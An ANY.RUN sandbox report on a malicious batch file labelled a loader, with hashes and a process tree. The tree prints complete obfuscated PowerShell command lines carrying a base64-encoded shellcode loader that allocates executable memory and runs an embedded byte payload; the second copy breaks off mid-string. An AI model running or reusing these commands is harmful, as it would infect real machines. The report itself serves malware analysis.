File name: | 24221.bat |
Full analysis: | https://app.any.run/tasks/259af38b-64e6-46f4-b839-f9f2d4c92a89 |
Verdict: | Malicious activity |
Threats: | A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection. |
Analysis date: | March 31, 2020, 05:08:47 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | text/x-msdos-batch |
File info: | DOS batch file, ASCII text, with very long lines, with CRLF line terminators |
MD5: | B48EB194FE09066C2C9A404204F2355A |
SHA1: | C56422E5369CD6A3F5EB14A54250A145B7AC5113 |
SHA256: | F464B61123A6051A00F244CCE24606113282EE2237EB810693DB0BE8270D7ACD |
SSDEEP: | 96:5F5db6bcZh3JZcZh+dS8hXUGexYJPWMyWFJfU8zNBH4HZkj+7INPiF5NMDBXmQtb:5Fhh5Ch4S8yGsQpZiziPZDBWQtokfF |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2896 | cmd /c ""C:\Users\admin\AppData\Local\Temp\24221.bat" " | C:\Windows\system32\cmd.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
272 | timeout /t 4 /nobreak | C:\Windows\system32\timeout.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: timeout - pauses command processing Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2584 | timeout /t 3 /nobreak | C:\Windows\system32\timeout.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: timeout - pauses command processing Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3368 | timeout /t 3 /nobreak | C:\Windows\system32\timeout.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: timeout - pauses command processing Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
1232 | powershell -w 1 -C "sv xL -;sv Pg ec;sv pRe ((gv xL).value.toString()+(gv Pg).value.toString());powershell (gv pRe).value.toString() 'JABWAHgAVQBjACAAPQAgACcAJABwAGkARQBBACAAPQAgACcAJwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgASQBuAHQAUAB0AHIAIABsAHAAQQBkAGQAcgBlAHMAcwAsACAAdQBpAG4AdAAgAGQAdwBTAGkAegBlACwAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsACAAdQBpAG4AdAAgAGYAbABQAHIAbwB0AGUAYwB0ACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsACAAdQBpAG4AdAAgAGQAdwBTAHQAYQBjAGsAUwBpAHoAZQAsACAASQBuAHQAUAB0AHIAIABsAHAAUwB0AGEAcgB0AEEAZABkAHIAZQBzAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwAIAB1AGkAbgB0ACAAZAB3AEMAcgBlAGEAdABpAG8AbgBGAGwAYQBnAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEkAZAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAHYAYwByAHQALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAG0AZQBtAHMAZQB0ACgASQBuAHQAUAB0AHIAIABkAGUAcwB0ACwAIAB1AGkAbgB0ACAAcwByAGMALAAgAHUAaQBuAHQAIABjAG8AdQBuAHQAKQA7ACcAJwA7ACQAdwAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAG0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHAAaQBFAEEAIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQBvAG4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAWwBCAHkAdABlAFsAXQBdADsAWwBCAHkAdABlAFsAXQBdACQAegAgAD0AIAAwAHgAZABhACwAMAB4AGMANwAsADAAeABkADkALAAwAHgANwA0ACwAMAB4ADIANAAsADAAeABmADQALAAwAHgANQBlACwAMAB4AGIAYgAsADAAeAA4AGUALAAwAHgAMQBkACwAMAB4ADIANAAsADAAeABlAGEALAAwAHgAMgA5ACwAMAB4AGMAOQAsADAAeABiADEALAAwAHgANQBiACwAMAB4ADMAMQAsADAAeAA1AGUALAAwAHgAMQA5ACwAMAB4ADgAMwAsADAAeABlAGUALAAwAHgAZgBjACwAMAB4ADAAMwAsADAAeAA1AGUALAAwAHgAMQA1ACwAMAB4ADYAYwAsADAAeABlADgALAAwAHgAZAA4ACwAMAB4ADAAMgAsADAAeABmADIALAAwAHgAMQAzACwAMAB4ADIAMQAsADAAeABkADMALAAwAHgAOQAyACwAMAB4ADkAYQAsADAAeABjADQALAAwAHgAZQAyACwAMAB4ADkAMgAsADAAeABmADkALAAwAHgAOABkACwAMAB4ADUANQAsADAAeAAyADIALAAwAHgAOAA5ACwAMAB4AGMAMAAsADAAeAA1ADkALAAwAHgAYwA5ACwAMAB4AGQAZgAsADAAeABmADAALAAwAHgAZQBhACwAMAB4AGIAZgAsADAAeABmADcALAAwAHgAZgA3ACwAMAB4ADUAYgAsADAAeAA3ADUALAAwAHgAMgBlACwAMAB4ADMAOQAsADAAeAA1AGIALAAwAHgAMgA1ACwAMAB4ADEAMgAsADAAeAA1ADgALAAwAHgAZABmACwAMAB4ADMANwAsADAAeAA0ADcALAAwAHgAYgBhACwAMAB4AGQAZQAsADAAeABmADgALAAwAHgAOQBhACwAMAB4AGIAYgAsADAAeAAyADcALAAwAHgAZQA0ACwAMAB4ADUANwAsADAAeABlADkALAAwAHgAZgAwACwAMAB4ADYAMwAsADAAeABjADUALAAwAHgAMQBlACwAMAB4ADcANAAsADAAeAAzADkALAAwAHgAZAA2ACwAMAB4ADkANQAsADAAeABjADYALAAwAHgAYQBjACwAMAB4ADUAZQAsADAAeAA0ADkALAAwAHgAOQBlACwAMAB4AGMAZgAsADAAeAA0AGYALAAwAHgAZABjACwAMAB4ADkANAAsADAAeAA5ADYALAAwAHgANABmACwAMAB4AGQAZQAsADAAeAA3ADkALAAwAHgAYQAzACwAMAB4AGQAOQAsADAAeABmADgALAAwAHgAOQBlACwAMAB4ADgAOQAsADAAeAA5ADAALAAwAHgANwAzACwAMAB4ADUANAAsADAAeAA2ADYALAAwAHgAMgAzACwAMAB4ADUAMgAsADAAeABhADQALAAwAHgAOAA3ACwAMAB4ADgAOAAsADAAeAA5AGIALAAwAHgAMAA4ACwAMAB4ADcAYQAsADAAeABkADAALAAwAHgAZABjACwAMAB4AGEAZgAsADAAeAA2ADQALAAwAHgAYQA3ACwAMAB4ADEANAAsADAAeABjAGMALAAwAHgAMQA5ACwAMAB4AGIAMAAsADAAeABlADIALAAwAHgAYQBlACwAMAB4AGMANQAsADAAeAAzADUALAAwAHgAZgAxACwAMAB4ADAAOQAsADAAeAA4AGUALAAwAHgAZQBlACwAMAB4AGQAZAAsADAAeABhADgALAAwAHgANAAzACwAMAB4ADYAOAAsADAAeAA5ADUALAAwAHgAYQA3ACwAMAB4ADIAOAAsADAAeABmAGUALAAwAHgAZgAxACwAMAB4AGEAYgAsADAAeABhAGYALAAwAHgAZAAzACwAMAB4ADgAOQAsADAAeABkADAALAAwAHgAMgA0ACwAMAB4AGQAMgAsADAAeAA1AGQALAAwAHgANQAxACwAMAB4ADcAZQAsADAAeABmADEALAAwAHgANwA5ACwAMAB4ADMAOQAsADAAeAAyADUALAAwAHgAOQA4ACwAMAB4AGQAOAAsADAAeABlADcALAAwAHgAOAA4ACwAMAB4AGEANQAsADAAeAAzAGIALAAwAHgANAA4ACwAMAB4ADcANQAsADAAeAAwADAALAAwAHgAMwA3ACwAMAB4ADYANQAsADAAeAA2ADIALAAwAHgAMwA5ACwAMAB4ADEAYQAsADAAeABlADIALAAwAHgAMQBhACwAMAB4ADIANwAsADAAeABkADEALAAwAHgAZgAyACwAMAB4ADgAYQAsADAAeABkADAALAAwAHgANwAwACwAMAB4ADkAZAAsADAAeAAyADMALAAwAHgANABiACwAMAB4AGUAYgAsADAAeAAyAGQALAAwAHgAYwA0ACwAMAB4ADUANQAsADAAeABlAGMALAAwAHgANQAyACwAMAB4AGYAZgAsADAAeABhAGIALAAwAHgAMgA5ACwAMAB4AGYAZgAsADAAeABhAGMALAAwAHgAOQA4ACwAMAB4ADkAZQAsADAAeAA1ADMALAAwAHgAMwBhACwAMAB4ADIANQAsADAAeAA3ADcALAAwAHgAMgBkACwAMAB4ADEAZAAsADAAeABhADYALAAwAHgAYQAyACwAMAB4ADkAZQAsADAAeAAzADIALAAwAHgAMwAzACwAMAB4ADQAZQAsADAAeAA3ADIALAAwAHgAZQA3ACwAMAB4AGEAYgAsADAAeABjAGQALAAwAHgAMgBhACwAMAB4ADAANwAsADAAeAAyAGMALAAwAHgAMAA2ACwAMAB4ADQAZQAsADAAeAAwADcALAAwAHgAMgBjACwAMAB4AGQANgAsADAAeAA0ADAALAAwAHgANwAyACwAMAB4ADEAYwAsADAAeABlADMALAAwAHgAZABmACwAMAB4ADMAOAAsADAAeAA2AGIALAAwAHgAMwBiACwAMAB4ADkANgAsADAAeABhADUALAAwAHgAZgA1ACwAMAB4ADQAMQAsADAAeAAxADIALAAwAHgANwAwACwAMAB4ADkAOQAsADAAeABmAGYALAAwAHgAYwBiACwAMAB4ADEANAAsADAAeAAzADkALAAwAHgANABkACwAMAB4AGEAMwAsADAAeABkAGQALAAwAHgAYQA2ACwAMAB4ADYAMAAsADAAeAAwAGQALAAwAHgANQAwACwAMAB4ADQANQAsADAAeAAxAGEALAAwAHgAMAA1ACwAMAB4ADIAMwAsADAAeAA5ADUALAAwAHgAOABjACwAMAB4ADgAZAAsADAAeABlADQALAAwAHgAMQBjACwAMAB4AGIAMwAsADAAeAA4ADgALAAwAHgAZgA1ACwAMAB4AGMAYQAsADAAeAA0ADUALAAwAHgAZAAyACwAMAB4ADUAYQAsADAAeAA5AGQALAAwAHgANQA1ACwAMAB4AGQAOQAsADAAeAAzADQALAAwAHgAZAA5ACwAMAB4ADAANQAsADAAeAA4AGUALAAwAHgAOQA3ACwAMAB4AGIANgAsADAAeABmAGEALAAwAHgANgA2ACwAMAB4ADcAZgAsADAAeABkADIALAAwAHgAYQA4ACwAMAB4AGEAOAAsADAAeAA0ADQALAAwAHgAZABiACwAMAB4ADgANgAsADAAeAAyADMALAAwAHgAZAAwACwAMAB4ADIAOQAsADAAeAA3ADYALAAwAHgAMQBmACwAMAB4ADcANwAsADAAeAA3AGQALAAwAHgAZABiACwAMAB4AGMAOQAsADAAeAAxAGYALAAwAHgAYQBjACwAMAB4AGQAZAAsADAAeABlAGQALAAwAHgAYQA0ACwAMAB4ADUAMQAsADAAeAAzADQALAAwAHgAOAA4ACwAMAB4ADkAYQAsADAAeABkAGIALAAwAHgAYQAxACwAMAB4AGYAYgAsADAAeAA5ADIALAAwAHgAMwA3ACwAMAB4AGMAZQAsADAAeABmAGIALAAwAHgAYwBhACwAMAB4ADcAMwAsADAAeAAzAGUALAAwAHgAYwBlACwAMAB4AGUAYQAsADAAeAA4ADMALAAwAHgANgBiACwAMAB4ADcAZQAsADAAeAA5AGYALAAwAHgAOQBhACwAMAB4AGYAYwAsADAAeAA3ADEALAAwAHgAZQBhACwAMAB4AGYAZgAsADAAeABhAGIALAAwAHgAOABlACwAMAB4AGMAMQAsADAAeAA2AGEALAAwAHgAMQA0ACwAMAB4ADEAOQAsADAAeABlADkALAAwAHgANwBhACwAMAB4ADkANAAsADAAeABkADkALAAwAHgAOAAxACwAMAB4ADcAYQAsADAAeAA5ADQALAAwAHgAOQA5ACwAMAB4ADUAMQAsADAAeAAyADgALAAwAHgAZgBjACwAMAB4ADQAMQAsADAAeABmADUALAAwAHgAOQBkACwAMAB4ADEAOQAsADAAeAA4AGUALAAwAHgAMgAwACwAMAB4AGIAMgAsADAAeABiADEALAAwAHgAMgAyACwAMAB4ADQAMwAsADAAeAA1ADIALAAwAHgANgAyACwAMAB4AGEAZAAsADAAeAA1ADMALAAwAHgAYgBkACwAMAB4ADgAZAAsADAAeAAyAGQALAAwAHgAMAAwACwAMAB4AGUAYgAsADAAeABlADUALAAwAHgAMwBmACwAMAB4ADMAMAAsADAAeAA5AGEALAAwAHgAMQA0ACwAMAB4AGMAMAAsADAAeABlADkALAAwAHgAMQA4ACwAMAB4ADEAOAAsADAAeAA0AGIALAAwAHgAZABjACwAMAB4AGEAOAAsADAAeAA5AGUALAAwAHgAYgA1ACwAMAB4ADEAZAAsADAAeAAyAGIALAAwAHgANgAwACwAMAB4AGMAMAAsADAAeAA0ADQALAAwAHgANgBjACwAMAB4AGEAMgAsADAAeAA3ADQALAAwAHgANgBlACwAMAB4AGYAMAAsADAAeABkAGIALAAwAHgANwA0ACwAMAB4ADkAMQAsADAAeAAzAGEALAAwAHgAMQBkACwAMAB4AGIAOAAsADAAeAA0ADMALAAwAHgAMABjACwAMAB4ADYAYgAsADAAeAA4AGYALAAwAHgAYgA1ACwAMAB4ADUAZgAsADAAeABhAGEALAAwAHgAZABjACwAMAB4AGUANwAsADAAeABhADYALAAwAHgAZgA1ACwAMAB4ADIAMgA7ACQAZwAgAD0AIAAwAHgAMQAwADAAMAA7AGkAZgAgACgAJAB6AC4ATABlAG4AZwB0AGgAIAAtAGcAdAAgADAAeAAxADAAMAAwACkAewAkAGcAIAA9ACAAJAB6AC4ATABlAG4AZwB0AGgAfQA7ACQAbgB4AEcAZwA9ACQAdwA6ADoAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKAAwACwAMAB4ADEAMAAwADAALAAkAGcALAAwAHgANAAwACkAOwBmAG8AcgAgACgAJABpAD0AMAA7ACQAaQAgAC0AbABlACAAKAAkAHoALgBMAGUAbgBnAHQAaAAtADEAKQA7ACQAaQArACsAKQAgAHsAJAB3ADoAOgBtAGUAbQBzAGUAdAAoAFsASQBuAHQAUAB0AHIAXQAoACQAbgB4AEcAZwAuAFQAbwBJAG4AdAAzADIAKAApACsAJABpACkALAAgACQAegBbACQAaQBdACwAIAAxACkAfQA7ACQAdwA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQAbgB4AEcAZwAsADAALAAwACwAMAApADsAZgBvAHIAIAAoADsAOwApAHsAUwB0AGEAcgB0AC0AcwBsAGUAZQBwACAANgAwAH0AOwAnADsAJABlACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABCAHkAdABlAHMAKAAkAFYAeABVAGMAKQApADsAJABPAHgAeABmACAAPQAgACIALQBlAGMAIAAiADsAaQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA4ACkAewAkAHEASQBNACAAPQAgACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0ACAAKwAgACIAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAiADsAaQBlAHgAIAAiACYAIAAkAHEASQBNACAAJABPAHgAeABmACAAJABlACIAfQBlAGwAcwBlAHsAOwBpAGUAeAAgACIAJgAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAkAE8AeAB4AGYAIAAkAGUAIgA7AH0A'" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2396 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ec JABWAHgAVQBjACAAPQAgACcAJABwAGkARQBBACAAPQAgACcAJwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgASQBuAHQAUAB0AHIAIABsAHAAQQBkAGQAcgBlAHMAcwAsACAAdQBpAG4AdAAgAGQAdwBTAGkAegBlACwAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsACAAdQBpAG4AdAAgAGYAbABQAHIAbwB0AGUAYwB0ACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsACAAdQBpAG4AdAAgAGQAdwBTAHQAYQBjAGsAUwBpAHoAZQAsACAASQBuAHQAUAB0AHIAIABsAHAAUwB0AGEAcgB0AEEAZABkAHIAZQBzAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwAIAB1AGkAbgB0ACAAZAB3AEMAcgBlAGEAdABpAG8AbgBGAGwAYQBnAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEkAZAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAHYAYwByAHQALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAG0AZQBtAHMAZQB0ACgASQBuAHQAUAB0AHIAIABkAGUAcwB0ACwAIAB1AGkAbgB0ACAAcwByAGMALAAgAHUAaQBuAHQAIABjAG8AdQBuAHQAKQA7ACcAJwA7ACQAdwAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAG0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHAAaQBFAEEAIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQBvAG4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAWwBCAHkAdABlAFsAXQBdADsAWwBCAHkAdABlAFsAXQBdACQAegAgAD0AIAAwAHgAZABhACwAMAB4AGMANwAsADAAeABkADkALAAwAHgANwA0ACwAMAB4ADIANAAsADAAeABmADQALAAwAHgANQBlACwAMAB4AGIAYgAsADAAeAA4AGUALAAwAHgAMQBkACwAMAB4ADIANAAsADAAeABlAGEALAAwAHgAMgA5ACwAMAB4AGMAOQAsADAAeABiADEALAAwAHgANQBiACwAMAB4ADMAMQAsADAAeAA1AGUALAAwAHgAMQA5ACwAMAB4ADgAMwAsADAAeABlAGUALAAwAHgAZgBjACwAMAB4ADAAMwAsADAAeAA1AGUALAAwAHgAMQA1ACwAMAB4ADYAYwAsADAAeABlADgALAAwAHgAZAA4ACwAMAB4ADAAMgAsADAAeABmADIALAAwAHgAMQAzACwAMAB4ADIAMQAsADAAeABkADMALAAwAHgAOQAyACwAMAB4ADkAYQAsADAAeABjADQALAAwAHgAZQAyACwAMAB4ADkAMgAsADAAeABmADkALAAwAHgAOABkACwAMAB4ADUANQAsADAAeAAyADIALAAwAHgAOAA5ACwAMAB4AGMAMAAsADAAeAA1ADkALAAwAHgAYwA5ACwAMAB4AGQAZgAsADAAeABmADAALAAwAHgAZQBhACwAMAB4AGIAZgAsADAAeABmADcALAAwAHgAZgA3ACwAMAB4ADUAYgAsADAAeAA3ADUALAAwAHgAMgBlACwAMAB4ADMAOQAsADAAeAA1AGIALAAwAHgAMgA1ACwAMAB4ADEAMgAsADAAeAA1ADgALAAwAHgAZABmACwAMAB4ADMANwAsADAAeAA0ADcALAAwAHgAYgBhACwAMAB4AGQAZQAsADAAeABmADgALAAwAHgAOQBhACwAMAB4AGIAYgAsADAAeAAyADcALAAwAHgAZQA0ACwAMAB4ADUANwAsADAAeABlADkALAAwAHgAZgAwACwAMAB4ADYAMwAsADAAeABjADUALAAwAHgAMQBlACwAMAB4ADcANAAsADAAeAAzADkALAAwAHgAZAA2ACwAMAB4ADkANQAsADAAeABjADYALAAwAHgAYQBjACwAMAB4ADUAZQAsADAAeAA0ADkALAAwAHgAOQBlACwAMAB4AGMAZgAsADAAeAA0AGYALAAwAHgAZABjACwAMAB4ADkANAAsADAAeAA5ADYALAAwAHgANABmACwAMAB4AGQAZQAsADAAeAA3ADkALAAwAHgAYQAzACwAMAB4AGQAOQAsADAAeABmADgALAAwAHgAOQBlACwAMAB4ADgAOQAsADAAeAA5ADAALAAwAHgANwAzACwAMAB4ADUANAAsADAAeAA2ADYALAAwAHgAMgAzACwAMAB4ADUAMgAsADAAeABhADQALAAwAHgAOAA3ACwAMAB4ADgAOAAsADAAeAA5AGIALAAwAHgAMAA4ACwAMAB4ADcAYQAsADAAeABkADAALAAwAHgAZABjACwAMAB4AGEAZgAsADAAeAA2ADQALAAwAHgAYQA3ACwAMAB4ADEANAAsADAAeABjAGMALAAwAHgAMQA5ACwAMAB4AGIAMAAsADAAeABlADIALAAwAHgAYQBlACwAMAB4AGMANQAsADAAeAAzADUALAAwAHgAZgAxACwAMAB4ADAAOQAsADAAeAA4AGUALAAwAHgAZQBlACwAMAB4AGQAZAAsADAAeABhADgALAAwAHgANAAzACwAMAB4ADYAOAAsADAAeAA5ADUALAAwAHgAYQA3ACwAMAB4ADIAOAAsADAAeABmAGUALAAwAHgAZgAxACwAMAB4AGEAYgAsADAAeABhAGYALAAwAHgAZAAzACwAMAB4ADgAOQAsADAAeABkADAALAAwAHgAMgA0ACwAMAB4AGQAMgAsADAAeAA1AGQALAAwAHgANQAxACwAMAB4ADcAZQAsADAAeABmADEALAAwAHgANwA5ACwAMAB4ADMAOQAsADAAeAAyADUALAAwAHgAOQA4ACwAMAB4AGQAOAAsADAAeABlADcALAAwAHgAOAA4ACwAMAB4AGEANQAsADAAeAAzAGIALAAwAHgANAA4ACwAMAB4ADcANQAsADAAeAAwADAALAAwAHgAMwA3ACwAMAB4ADYANQAsADAAeAA2ADIALAAwAHgAMwA5ACwAMAB4ADEAYQAsADAAeABlADIALAAwAHgAMQBhACwAMAB4ADIANwAsADAAeABkADEALAAwAHgAZgAyACwAMAB4ADgAYQAsADAAeABkADAALAAwAHgANwAwACwAMAB4ADkAZAAsADAAeAAyADMALAAwAHgANABiACwAMAB4AGUAYgAsADAAeAAyAGQALAAwAHgAYwA0ACwAMAB4ADUANQAsADAAeABlAGMALAAwAHgANQAyACwAMAB4AGYAZgAsADAAeABhAGIALAAwAHgAMgA5ACwAMAB4AGYAZgAsADAAeABhAGMALAAwAHgAOQA4ACwAMAB4ADkAZQAsADAAeAA1ADMALAAwAHgAMwBhACwAMAB4ADIANQAsADAAeAA3ADcALAAwAHgAMgBkACwAMAB4ADEAZAAsADAAeABhADYALAAwAHgAYQAyACwAMAB4ADkAZQAsADAAeAAzADIALAAwAHgAMwAzACwAMAB4ADQAZQAsADAAeAA3ADIALAAwAHgAZQA3ACwAMAB4AGEAYgAsADAAeABjAGQALAAwAHgAMgBhACwAMAB4ADAANwAsADAAeAAyAGMALAAwAHgAMAA2ACwAMAB4ADQAZQAsADAAeAAwADcALAAwAHgAMgBjACwAMAB4AGQANgAsADAAeAA0ADAALAAwAHgANwAyACwAMAB4ADEAYwAsADAAeABlADMALAAwAHgAZABmACwAMAB4ADMAOAAsADAAeAA2AGIALAAwAHgAMwBiACwAMAB4ADkANgAsADAAeABhADUALAAwAHgAZgA1ACwAMAB4ADQAMQAsADAAeAAxADIALAAwAHgANwAwACwAMAB4ADkAOQAsADAAeABmAGYALAAwAHgAYwBiACwAMAB4ADEANAAsADAAeAAzADkALAAwAHgANABkACwAMAB4AGEAMwAsADAAeABkAGQALAAwAHgAYQA2ACwAMAB4ADYAMAAsADAAeAAwAGQALAAwAHgANQAwACwAMAB4ADQANQAsADAAeAAxAGEALAAwAHgAMAA1ACwAMAB4ADIAMwAsADAAeAA5ADUALAAwAHgAOABjACwAMAB4ADgAZAAsADAAeABlADQALAAwAHgAMQBjACwAMAB4AGIAMwAsADAAeAA4ADgALAAwAHgAZgA1ACwAMAB4AGMAYQAsADAAeAA0ADUALAAwAHgAZAAyACwAMAB4ADUAYQAsADAAeAA5AGQALAAwAHgANQA1ACwAMAB4AGQAOQAsADAAeAAzADQALAAwAHgAZAA5ACwAMAB4ADAANQAsADAAeAA4AGUALAAwAHgAOQA3ACwAMAB4AGIANgAsADAAeABmAGEALAAwAHgANgA2ACwAMAB4ADcAZgAsADAAeABkADIALAAwAHgAYQA4ACwAMAB4AGEAOAAsADAAeAA0ADQALAAwAHgAZABiACwAMAB4ADgANgAsADAAeAAyADMALAAwAHgAZAAwACwAMAB4ADIAOQAsADAAeAA3ADYALAAwAHgAMQBmACwAMAB4ADcANwAsADAAeAA3AGQALAAwAHgAZABiACwAMAB4AGMAOQAsADAAeAAxAGYALAAwAHgAYQBjACwAMAB4AGQAZAAsADAAeABlAGQALAAwAHgAYQA0ACwAMAB4ADUAMQAsADAAeAAzADQALAAwAHgAOAA4ACwAMAB4ADkAYQAsADAAeABkAGIALAAwAHgAYQAxACwAMAB4AGYAYgAsADAAeAA5ADIALAAwAHgAMwA3ACwAMAB4AGMAZQAsADAAeABmAGIALAAwAHgAYwBhACwAMAB4ADcAMwAsADAAeAAzAGUALAAwAHgAYwBlACwAMAB4AGUAYQAsADAAeAA4ADMALAAwAHgANgBiACwAMAB4ADcAZQAsADAAeAA5AGYALAAwAHgAOQBhACwAMAB4AGYAYwAsADAAeAA3ADEALAAwAHgAZQBhACwAMAB4AGYAZgAsADAAeABhAGIALAAwAHgAOABlACwAMAB4AGMAMQAsADAAeAA2AGEALAAwAHgAMQA0ACwAMAB4ADEAOQAsADAAeABlADkALAAwAHgANwBhACwAMAB4ADkANAAsADAAeABkADkALAAwAHgAOAAxACwAMAB4ADcAYQAsADAAeAA5ADQALAAwAHgAOQA5ACwAMAB4ADUAMQAsADAAeAAyADgALAAwAHgAZgBjACwAMAB4ADQAMQAsADAAeABmADUALAAwAHgAOQBkACwAMAB4ADEAOQAsADAAeAA4AGUALAAwAHgAMgAwACwAMAB4AGIAMgAsADAAeABiADEALAAwAHgAMgAyACwAMAB4ADQAMwAsADAAeAA1ADIALAAwAHgANgAyACwAMAB4AGEAZAAsADAAeAA1ADMALAAwAHgAYgBkACwAMAB4ADgAZAAsADAAeAAyAGQALAAwAHgAMAAwACwAMAB4AGUAYgAsADAAeABlADUALAAwAHgAMwBmACwAMAB4ADMAMAAsADAAeAA5AGEALAAwAHgAMQA0ACwAMAB4AGMAMAAsADAAeABlADkALAAwAHgAMQA4ACwAMAB4ADEAOAAsADAAeAA0AGIALAAwAHgAZABjACwAMAB4AGEAOAAsADAAeAA5AGUALAAwAHgAYgA1ACwAMAB4ADEAZAAsADAAeAAyAGIALAAwAHgANgAwACwAMAB4AGMAMAAsADAAeAA0ADQALAAwAHgANgBjACwAMAB4AGEAMgAsADAAeAA3ADQALAAwAHgANgBlACwAMAB4AGYAMAAsADAAeABkAGIALAAwAHgANwA0ACwAMAB4ADkAMQAsADAAeAAzAGEALAAwAHgAMQBkACwAMAB4AGIAOAAsADAAeAA0ADMALAAwAHgAMABjACwAMAB4ADYAYgAsADAAeAA4AGYALAAwAHgAYgA1ACwAMAB4ADUAZgAsADAAeABhAGEALAAwAHgAZABjACwAMAB4AGUANwAsADAAeABhADYALAAwAHgAZgA1ACwAMAB4ADIAMgA7ACQAZwAgAD0AIAAwAHgAMQAwADAAMAA7AGkAZgAgACgAJAB6AC4ATABlAG4AZwB0AGgAIAAtAGcAdAAgADAAeAAxADAAMAAwACkAewAkAGcAIAA9ACAAJAB6AC4ATABlAG4AZwB0AGgAfQA7ACQAbgB4AEcAZwA9ACQAdwA6ADoAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKAAwACwAMAB4ADEAMAAwADAALAAkAGcALAAwAHgANAAwAC